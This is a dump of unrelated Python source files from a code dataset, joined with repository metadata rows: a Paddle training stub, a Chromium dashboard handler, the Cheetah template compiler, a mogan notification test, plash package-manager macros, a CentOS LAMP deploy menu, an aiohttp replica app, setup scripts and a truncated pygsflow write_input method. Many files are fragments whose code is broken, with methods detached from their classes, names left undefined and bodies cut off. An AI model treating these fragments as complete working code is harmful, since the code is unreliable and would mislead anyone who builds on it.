] | null | null | null | train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | bb8b5b90052feef39fafd2a790f08b80b45fbe41 | [
"Apache-2.0"
] | 1 | 2021-08-07T14:56:44.000Z | 2021-08-07T14:56:44.000Z | # coding: utf-8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import importlib
from visualdl import LogWriter
import numpy as np
import pickle
from models import utils
from config import parser_args
if __name__ == '__main__':
args = parser_args()
utils.seed_paddle(args.seed)
if not args.high_level_api:
train_model(args)
else:
train_hl_api(args) | 47.899281 | 169 | 0.615801 |
466669f55fd94ab7691c895cf787adfe7eec635c | 1,204 | py | Python | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | 1 | 2020-03-11T12:19:13.000Z | 2020-03-11T12:19:13.000Z | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | null | null | null | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | null | null | null | import os
from . import common
import cv2
import numpy as np
import imageio
import torch
import torch.utils.data as data
| 26.755556 | 77 | 0.623754 |
46674d12a75c726caab7f069ff51c1295884c1f4 | 67 | py | Python | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 5 | 2018-10-15T15:33:32.000Z | 2021-01-13T23:03:48.000Z | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 18 | 2019-12-10T22:11:27.000Z | 2021-12-13T20:42:58.000Z | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 4 | 2018-10-15T15:59:25.000Z | 2020-04-11T17:48:35.000Z | from .contact_submission_resource import ContactSubmissionResource
| 33.5 | 66 | 0.925373 |
4667ccf5ef5c78e64a0eadc56411d4151f24e864 | 6,395 | py | Python | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | null | null | null | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | null | null | null | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | 1 | 2020-09-29T19:23:59.000Z | 2020-09-29T19:23:59.000Z | # -*- coding: utf-8 -*-
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'ericbidelman@chromium.org (Eric Bidelman)'
import collections
import json
import logging
import os
import webapp2
import yaml
# Appengine imports.
from google.appengine.api import memcache
import common
import models
import settings
import util
from schedule import construct_chrome_channels_details
# Add user to component subscribers.
# NOTE(review): this handler was extracted without its enclosing class --
# the name-mangled call ``self.__update_subscribers_list`` only resolves
# inside the class it was defined in; presumably a webapp2 RequestHandler.
def post(self, path):
    # Add user to component subscribers.
    # Expects a JSON body with 'userId', 'componentName' and 'primary' keys
    # (any of them may be absent; .get() yields None then).
    params = json.loads(self.request.body)
    self.__update_subscribers_list(True, user_id=params.get('userId'),
                                   blink_component=params.get('componentName'),
                                   primary=params.get('primary'))
    # memcache.flush_all()
    # memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX))
    # Respond with 200 and echo the parsed parameters back to the caller.
    self.response.set_status(200, message='User added to subscribers')
    return self.response.write(json.dumps(params))
class SubscribersHandler(common.ContentHandler):
# WSGI routing table. Most specific routes first; the '(.*)' catch-all
# sends everything else to BlinkHandler.
# NOTE(review): PopulateSubscribersHandler and BlinkHandler are defined in
# parts of the original file elided from this extract -- verify they exist
# before reusing this fragment.
app = webapp2.WSGIApplication([
    ('/admin/blink/populate_subscribers', PopulateSubscribersHandler),
    ('/admin/subscribers(.*)', SubscribersHandler),
    ('(.*)', BlinkHandler),
], debug=settings.DEBUG)
| 34.945355 | 124 | 0.70086 |
46687db58d5ce22cf64d16f65406c0bb8f14b56a | 2,756 | py | Python | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 23 | 2018-02-23T12:56:43.000Z | 2021-12-20T13:21:47.000Z | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 17 | 2018-02-23T12:52:39.000Z | 2018-12-04T05:50:58.000Z | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 2 | 2018-06-16T20:52:23.000Z | 2021-04-08T15:29:44.000Z | from OBlog import database as db
from flask import g, current_app
import re
import os
| 22.590164 | 96 | 0.576197 |
4669e171fec58193272f58bd7b305ba7d5f7aed0 | 78,232 | py | Python | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 83 | 2017-03-15T12:43:25.000Z | 2022-03-31T12:38:44.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 18 | 2017-03-20T14:12:58.000Z | 2021-07-28T09:11:55.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 25 | 2017-04-01T01:40:02.000Z | 2022-02-20T11:08:12.000Z | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
DEFAULT_COMPILER_SETTINGS = {
## controlling the handling of Cheetah $placeholders
'useNameMapper': True, # Unified dotted notation and the searchList
'useSearchList': True, # if false, assume the first
# portion of the $variable (before the first dot) is a global,
# builtin, or local var that doesn't need
# looking up in the searchlist BUT use
# namemapper on the rest of the lookup
'allowSearchListAsMethArg': True,
'useAutocalling': True, # detect and call callable()'s, requires NameMapper
'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList
# rather than NameMapper.valueFromSearchList
'useErrorCatcher':False,
'alwaysFilterNone':True, # filter out None, before the filter is called
'useFilters':True, # use str instead if =False
'includeRawExprInFilterArgs':True,
#'lookForTransactionAttr':False,
'autoAssignDummyTransactionToSelf':False,
'useKWsDictArgForPassingTrans':True,
## controlling the aesthetic appearance / behaviour of generated code
'commentOffset': 1,
# should shorter str constant chunks be printed using repr rather than ''' quotes
'reprShortStrConstants': True,
'reprNewlineThreshold':3,
'outputRowColComments':True,
# should #block's be wrapped in a comment in the template's output
'includeBlockMarkers': False,
'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
'setup__str__method': False,
'mainMethodName':'respond',
'mainMethodNameForSubclasses':'writeBody',
'indentationStep': ' '*4,
'initialMethIndentLevel': 2,
'monitorSrcFile':False,
'outputMethodsBeforeAttributes': True,
## customizing the #extends directive
'autoImportForExtendsDirective':True,
'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName)
# a callback hook for customizing the
# #extends directive. It can manipulate
# the compiler's state if needed.
# also see allowExpressionsInExtendsDirective
# input filtering/restriction
# use lower case keys here!!
'disabledDirectives':[], # list of directive keys, without the start token
'enabledDirectives':[], # list of directive keys, without the start token
'disabledDirectiveHooks':[], # callable(parser, directiveKey)
'preparseDirectiveHooks':[], # callable(parser, directiveKey)
'postparseDirectiveHooks':[], # callable(parser, directiveKey)
'preparsePlaceholderHooks':[], # callable(parser)
'postparsePlaceholderHooks':[], # callable(parser)
# the above hooks don't need to return anything
'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None)
# exprType is the name of the directive, 'psp', or 'placeholder'. all
# lowercase. The filters *must* return the expr or raise an exception.
# They can modify the expr if needed.
'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses
'i18NFunctionName':'self.i18n',
## These are used in the parser, but I've put them here for the time being to
## facilitate separating the parser and compiler:
'cheetahVarStartToken':'$',
'commentStartToken':'##',
'multiLineCommentStartToken':'#*',
'multiLineCommentEndToken':'*#',
'gobbleWhitespaceAroundMultiLineComments':True,
'directiveStartToken':'#',
'directiveEndToken':'#',
'allowWhitespaceAfterDirectiveStartToken':False,
'PSPStartToken':'<%',
'PSPEndToken':'%>',
'EOLSlurpToken':'#',
'gettextTokens': ["_", "N_", "ngettext"],
'allowExpressionsInExtendsDirective': False, # the default restricts it to
# accepting dotted names
'allowEmptySingleLineMethods': False,
'allowNestedDefScopes': True,
'allowPlaceholderFilterArgs': True,
## See Parser.initDirectives() for the use of the next 3
#'directiveNamesAndParsers':{}
#'endDirectiveNamesAndHandlers':{}
#'macroDirectives':{}
}
##################################################
## METHOD COMPILERS
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
##################################################
## MODULE COMPILERS
##################################################
## Make Compiler an alias for ModuleCompiler
Compiler = ModuleCompiler
| 39.631206 | 117 | 0.585323 |
466a34ecb0421da1e44f26b4a2ebb96b4fc1273b | 1,267 | py | Python | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 11 | 2019-02-07T16:13:59.000Z | 2021-08-14T03:53:14.000Z | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | null | null | null | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 3 | 2019-02-07T16:14:09.000Z | 2021-08-14T05:09:17.000Z | # -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
if __name__ == '__main__':
    # process_args() presumably consumes the tool-specific CLI options and
    # returns how many argv entries it used -- TODO confirm against plmn.utils.
    nargs = process_args()
    # Strip the consumed options so unittest only sees its own arguments;
    # exit=False keeps the interpreter alive so results can be printed below.
    unittest.main(argv=sys.argv[nargs:], exit=False)
    Results.print_results()
| 31.675 | 89 | 0.750592 |
466a6d9821a84e031f7dcd282011c9bf05adc133 | 13,877 | py | Python | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from oslo_versionedobjects import fixture as object_fixture
from mogan.notifications import base as notification_base
from mogan.notifications.objects import base as notification
from mogan.objects import base
from mogan.objects import fields
from mogan.objects import server as server_obj
from mogan.tests import base as test_base
from mogan.tests.unit.db import utils as db_utils
# Expected fingerprints of the versioned notification objects, keyed by
# class name, as '<version>-<hash>' strings. Presumably compared against
# freshly computed object hashes so schema changes force a version bump --
# TODO confirm against the (elided) test class in the original file.
notification_object_data = {
    'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd',
    'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6',
    'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3',
    'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2',
    'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18',
    'EventType': '1.0-589894aac7c98fb640eca394f67ad621',
    'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b'
}
| 41.423881 | 79 | 0.64906 |
466b2847bd0a3e11bd815c4ef8485277011347fd | 1,208 | py | Python | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | from plash.eval import eval, register_macro, shell_escape_args
# Register package-manager shortcuts via plash's own ``eval`` (imported
# above from plash.eval -- this is NOT the Python builtin). Each entry is
# a 'defpm' macro call: [name, setup command(s)..., install template],
# where '{}' is substituted with the requested package names.
# NOTE(review): only the add-apt-repository entry prefixes its last
# command with 'run ' -- confirm against plash's defpm semantics whether
# that prefix is intentional.
eval([[
    'defpm',
    'apt',
    'apt-get update',
    'apt-get install -y {}',
], [
    'defpm',
    'add-apt-repository',
    'apt-get install software-properties-common',
    'run add-apt-repository -y {}',
], [
    'defpm',
    'apk',
    'apk update',
    'apk add {}',
], [
    'defpm',
    'yum',
    'yum install -y {}',
], [
    'defpm',
    'dnf',
    'dnf install -y {}',
], [
    'defpm',
    'pip',
    'pip install {}',
], [
    'defpm',
    'pip3',
    'pip3 install {}',
], [
    'defpm',
    'npm',
    'npm install -g {}',
], [
    'defpm',
    'pacman',
    'pacman -Sy --noconfirm {}',
], [
    'defpm',
    'emerge',
    'emerge {}',
]])
| 18.875 | 69 | 0.537252 |
466ccc900104e36f636478253e917a965c1df4d3 | 371 | py | Python | app/schemas/email.py | waynesun09/notify-service | 768a0db264a9e57eecce283108878e24e8d3b740 | [
"MIT"
] | 5 | 2020-12-20T17:10:46.000Z | 2021-08-20T05:00:58.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 13 | 2021-01-07T14:17:14.000Z | 2022-01-05T20:36:36.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 1 | 2022-01-06T22:21:09.000Z | 2022-01-06T22:21:09.000Z | from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
| 18.55 | 40 | 0.719677 |
466d26384d26ffba4886645e21f0b784ab726d0b | 470 | py | Python | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | 1 | 2021-11-25T07:50:10.000Z | 2021-11-25T07:50:10.000Z | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | null | null | null | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | null | null | null | from rankedchoicevoting import Poll
# Example: run a small ranked-choice election with three seed candidates.
# Every candidate starts with a zero tally.
candidatesA = dict.fromkeys(["Bob", "Sue", "Bill"], 0)

# Each ballot lists that voter's ranking, first choice through last.
votersA = dict(
    a=['Bob', 'Bill', 'Sue'],
    b=['Sue', 'Bob', 'Bill'],
    c=['Bill', 'Sue', 'Bob'],
    d=['Bob', 'Bill', 'Sue'],
    f=['Sue', 'Bob', 'Bill'],
)

election = Poll(candidatesA, votersA)
# Candidates and ballots can also be added after construction.
election.addCandidate("Joe", 0)
election.addVoter("g", ['Joe', 'Bob'])
print("Winner: " + election.getPollResults())
| 24.736842 | 53 | 0.576596 |
466d4b83456bbb93d38bc63179c0f99d00a30a62 | 2,422 | py | Python | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | 3 | 2015-04-08T18:41:02.000Z | 2015-10-28T09:54:47.000Z | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking the OS version should happen before the menu appears.
# NOTE(review): this script relies on Python 2 semantics -- ``input()``
# evaluates the typed text, so the integer comparisons below work. Under
# Python 3, ``input()`` returns a string and no menu branch would match.
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before showing the menu
os.system('clear')
answer = True
while answer:
    print ("""
    LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
    ---------------------------------------------------
    1. Check version of your CentOS
    2. Check Internet connection
    3. Show me my local IP address
    4. Open port 80 to Web
    5. Show me my localhost name
    ------- LAMP for CentOS 6.x -----------
    6. Install EPEL & IUS repository
    7. Install Web Server - Apache
    8. Install Database - MySQL
    9. Install Language - PHP
    10. Install LAMP in "One Click" - CentOS 6.x
    11. Exit/Quit
    """)
    answer = input("Please make your choice: ")
    if answer == 1:
        os.system('clear')
        print ('\nChecking version of the system: ')
        SystemUtils.check_centos_version()
    elif answer == 2:
        os.system('clear')
        print ('\nChecking if you connected to the Internet')
        SystemUtils.check_internet_connection()
    elif answer == 3:
        os.system('clear')
        print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
    elif answer == 4:
        os.system('clear')
        print('\nChecking firewall')
        Centos6Deploy.iptables_port()
    elif answer == 5:
        # Fix: this was the lone Python-2 ``print "..."`` statement in the
        # file (every other branch uses the call form); the single-argument
        # call form prints identically under Python 2 and parses under 3.
        print("Checking local hostname...")
        SystemUtils.check_host_name()
    elif answer == 6:
        print ('\nInstalling EPEL and IUS repository to the system...')
        Centos6Deploy.add_repository()
    elif answer == 7:
        print ('\nInstalling Web Server Apache...')
        Centos6Deploy.install_apache()
    elif answer == 8:
        print ('\nInstalling database MySQL...')
        Centos6Deploy.install_mysql()
    elif answer == 9:
        print('\nInstalling PHP...')
        Centos6Deploy.install_php()
    elif answer == 10:
        # NOTE(review): the "One Click" path never calls install_apache(),
        # unlike menu option 7 -- confirm whether that omission is intended.
        print ('Install LAMP in "One Click" - CentOS 6.x')
        Centos6Deploy.iptables_port()
        Centos6Deploy.add_repository()
        Centos6Deploy.install_mysql()
        Centos6Deploy.install_php()
    elif answer == 11:
        print("\nGoodbye...\n")
        answer = None
    else:
        print ('\nNot valid Choice, Try Again')
        # Fix: dataset-extraction residue (" | 31.051282 | 77 | ...") was
        # fused onto this line, making it a syntax error; removed.
        answer = True
466dad9d3b71c7956f19885bfc3e8b7004d94303 | 1,923 | py | Python | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | import asyncio
import os
import time
from dataclasses import dataclass
import requests_unixsocket
from aiohttp import ClientSession, web
# NOTE(review): replicas_discovery(), index() and hello() are defined in
# parts of the original file elided from this extract.
# Discover the peer replicas, then remember this replica's own id
# (next() raises StopIteration if no replica is marked is_self).
replicas = replicas_discovery()
self_id = next(filter(lambda x: x.is_self, replicas)).replica_id
# flush=True so the line appears immediately in container logs.
print(replicas, flush=True)
# Wire up the aiohttp application and serve on all interfaces.
app = web.Application()
app.add_routes([web.get('/', index),
                web.get('/hello', hello)])
web.run_app(app, host='0.0.0.0', port=8080)
| 28.279412 | 115 | 0.651586 |
466e8b57966faf4a0cc17febbe2a82c29fab5e61 | 802 | py | Python | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | null | null | null | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 1 | 2019-10-16T14:00:25.000Z | 2019-11-11T16:23:20.000Z | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 2 | 2017-05-15T06:03:27.000Z | 2019-07-21T09:04:24.000Z | from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
# Package metadata is centralized in txjsonrpc.meta; dist.catReST stitches
# the listed docs into a single reST long_description (stop_on_errors makes
# a bad doc fail the build instead of shipping broken metadata).
setup(
    name=meta.display_name,
    version=meta.version,
    description=meta.description,
    author=meta.author,
    author_email=meta.author_email,
    url=meta.url,
    license=meta.license,
    # Discover subpackages automatically instead of listing them by hand.
    packages=dist.findPackages(meta.library_name),
    long_description=dist.catReST(
        "docs/PRELUDE.txt",
        "README",
        "docs/DEPENDENCIES.txt",
        "docs/INSTALL.txt",
        "docs/USAGE.txt",
        "TODO",
        "docs/HISTORY.txt",
        stop_on_errors=True,
        out=True),
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Programming Language :: Python",
    ],
)
| 24.30303 | 50 | 0.63591 |
466e8e7393dfb5f6f03f625478a37ff5c418e4db | 28,135 | py | Python | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 17 | 2019-11-11T02:49:29.000Z | 2022-02-17T03:45:19.000Z | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 21 | 2019-07-10T21:45:11.000Z | 2022-02-22T17:57:20.000Z | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 8 | 2019-11-11T02:49:36.000Z | 2021-09-30T18:43:45.000Z | # -*- coding: utf-8 -*-
import os
from .control import ControlFile
from .prms import PrmsModel
from .utils import gsflow_io, GsConstant
from .prms import Helper
from .modflow import Modflow
from .modsim import Modsim
import flopy
import subprocess as sp
import platform
import warnings
warnings.simplefilter("always", PendingDeprecationWarning)
warnings.simplefilter("always", UserWarning)
def write_input(self, basename=None, workspace=None, write_only=None):
    """
    Write input files for gsflow. Four cases are possible:
        (1) if basename and workspace are None, the existing files
            will be overwritten
        (2) if basename is specified, only file names will be changed
        (3) if only workspace is specified, only the folder will be changed
        (4) when both basename and workspace are specified, both are changed
    Parameters
    ----------
    basename : str
        project basename
    workspace : str
        model output directory
    write_only : list
        ['control', 'parameters', 'prms_data', 'mf', 'modsim']
    Examples
    --------
    >>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control')
    >>> gsf.write_input(basename="new", workspace="../new_model")
    """
    print("Writing the project files .....")
    if workspace is not None:
        workspace = os.path.abspath(workspace)
    # Case (1): overwrite in place.
    if (basename, workspace) == (None, None):
        print("Warning: input files will be overwritten....")
        self._write_all(write_only)
    # only change the directory
    elif basename is None and workspace is not None:
        if not (os.path.isdir(workspace)):
            os.mkdir(workspace)
        fnn = os.path.basename(self.control.control_file)
        self.control.model_dir = workspace
        self.control.control_file = os.path.join(workspace, fnn)
        self.control_file = os.path.join(workspace, fnn)
        if self.prms is not None:
            self.prms.control_file = self.control_file
            # change parameters
            new_param_file_list = []
            for par_record in self.prms.parameters.parameters_list:
                curr_file = os.path.basename(par_record.file_name)
                curr_file = os.path.join(workspace, curr_file)
                par_record.file_name = curr_file
                if not (curr_file in new_param_file_list):
                    new_param_file_list.append(curr_file)
            self.control.set_values("param_file", new_param_file_list)
            # change datafile (stored relative to the control file's dir)
            curr_file = os.path.relpath(
                os.path.join(workspace, self.prms.data.name),
                self.control.model_dir,
            )
            self.prms.data.model_dir = workspace
            self.control.set_values("data_file", [curr_file])
        # change mf
        if self.mf is not None:
            self.mf.change_model_ws(workspace, reset_external=True)
            mfnm = self.mf.name + ".nam"
            self.control.set_values("modflow_name", [mfnm])
        # update file names in control object
        self._update_control_fnames(workspace, basename)
        # write
        if self.prms is not None:
            self.prms.control = self.control
        self._write_all(write_only)
    # only change the basename
    elif basename is not None and workspace is None:
        cnt_file = basename + "_cont.control"
        ws_ = os.path.dirname(self.control.control_file)
        self.control.control_file = os.path.join(ws_, cnt_file)
        self.control_file = os.path.join(ws_, cnt_file)
        # NOTE(review): unlike the workspace-only branch above, self.prms
        # is dereferenced here with no None guard -- a model loaded without
        # a PRMS component would raise AttributeError; confirm intent.
        self.prms.control_file = self.control_file
        # change parameters
        flist = self.prms.parameters.parameter_files
        new_param_file_list = []
        for ifile, par_record in enumerate(
            self.prms.parameters.parameters_list
        ):
            # Parameter files are renumbered by their position in the
            # original file list.
            file_index = flist.index(par_record.file_name)
            par_file = basename + "_par_{}.params".format(file_index)
            curr_dir = self.control.model_dir
            curr_file = os.path.join(curr_dir, par_file)
            par_record.file_name = curr_file
            if not (curr_file in new_param_file_list):
                new_param_file_list.append(curr_file)
        self.control.set_values("param_file", new_param_file_list)
        # change datafile
        dfile = basename + "_dat.data"
        curr_file = os.path.relpath(
            os.path.join(self.prms.data.model_dir, dfile),
            self.control.model_dir,
        )
        self.prms.data.name = dfile
        self.control.set_values("data_file", [curr_file])
        # change mf
        if self.mf is not None:
            curr_dir = self.mf.model_ws
            self.mf._set_name(basename)
            self._update_mf_basename(basename)
            mfnm = self.mf.name + ".nam"
            self.control.set_values("modflow_name", [mfnm])
        # update file names in control object
        self._update_control_fnames(workspace, basename)
        self.prms.control = self.control
        self._write_all(write_only)
    # change both directory & basename
    elif basename is not None and workspace is not None:
        if not (os.path.isdir(workspace)):
            os.mkdir(workspace)
        cnt_file = basename + "_cont.control"
        self.control.model_dir = workspace
        self.control.control_file = os.path.join(workspace, cnt_file)
        # NOTE(review): same unguarded self.prms access as the
        # basename-only branch -- confirm PRMS is required here.
        self.prms.control_file = self.control.control_file
        self.control_file = self.control.control_file
        # change parameters
        # get param files list
        flist = self.prms.parameters.parameter_files
        new_param_file_list = []
        for ifile, par_record in enumerate(
            self.prms.parameters.parameters_list
        ):
            file_index = flist.index(par_record.file_name)
            par_file = basename + "_par_{}.params".format(file_index)
            curr_file = os.path.join(workspace, par_file)
            par_record.file_name = curr_file
            if not (curr_file in new_param_file_list):
                new_param_file_list.append(curr_file)
        self.control.set_values("param_file", new_param_file_list)
        # change datafile
        dfile = basename + "_dat.data"
        curr_file = os.path.relpath(
            os.path.join(workspace, dfile), self.control.model_dir
        )
        self.prms.data.model_dir = workspace
        self.prms.data.name = dfile
        self.control.set_values("data_file", [curr_file])
        # flatten mf
        if self.mf is not None:
            self.mf.change_model_ws(workspace)
